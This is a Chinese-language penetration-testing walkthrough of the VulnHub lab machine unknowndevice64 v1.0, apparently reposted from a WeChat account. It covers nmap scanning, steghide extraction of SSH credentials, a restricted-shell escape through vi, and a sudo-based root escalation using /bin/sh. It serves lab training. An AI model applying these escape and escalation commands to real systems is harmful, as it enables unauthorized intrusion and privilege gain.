0x01 环境及配置
难度:中级
目标:获取root权限并阅读/root/flag.txt
网络:桥接模式 DHCP自动分配IP地址
下载地址:https://mega.nz/#!WyQ1UaKC!azV9qvOXqzxOXFcE9qP15fQTEOWgr27plE0SmZTvGhk
1.查看靶机IP地址
-lnmap -sP+攻击机ip地址
2.查看靶机开放端口
nmap -sS -Pn -A -p- -n 靶机ip
发现靶机开放1337-ssh端口服务,31337-http端口服务;
3.根据端口服务进行渗透(31337-http端口服务)
查看网页源代码
把图片下载到本地
猜测是ctf的隐写漏洞
Kali Steghide开源隐写工具
http://blog.csdn.net/weixin_46700042/article/details/108565769用steghide进行提取其中的文本信息:
steghide extract -sf key_is_h1dd3n.jpg提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt
打开之后的文件信息为一种brainfuck的程序语言,使用在线工具
https://copy.sh/brainfuck/https://www.splitbrain.org/services/ook
在线解密后即可获取到ssh的用户名和密码
4.登陆ssh(1337-ssh端口服务)
ssh ud64@192.168.110.197 -p 1337
尝试各种命令都被限制,竟然是rbash的shell
绕过rbash提权
在vi命令行下输入!/bin/bash即可顺利进入bash通过export命令修改环境变量,将/bin/bash导出到shell环境变量,将/usr/bin目录导出到PATH环境变量:export SHELL=/bin/bash:$SHELLexport PATH=/usr/bin:$PATHexport PATH=/bin:$PATH
使用sudo-l查看sudo权限,发现可以无密码登录sysud64
使用sudo sysud64 -h查看帮助消息,发现可以使用
-o file send trace output to FILE instead of stderr尝试将root用户的shell导出到该用户下
sudo sysud64 -o /dev/null /bin/shwhoami,查看当前用户权限为root
原文始发于微信公众号(网络安全学习爱好者):vulnhub之unknowndevice64-V1.0渗透实战
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论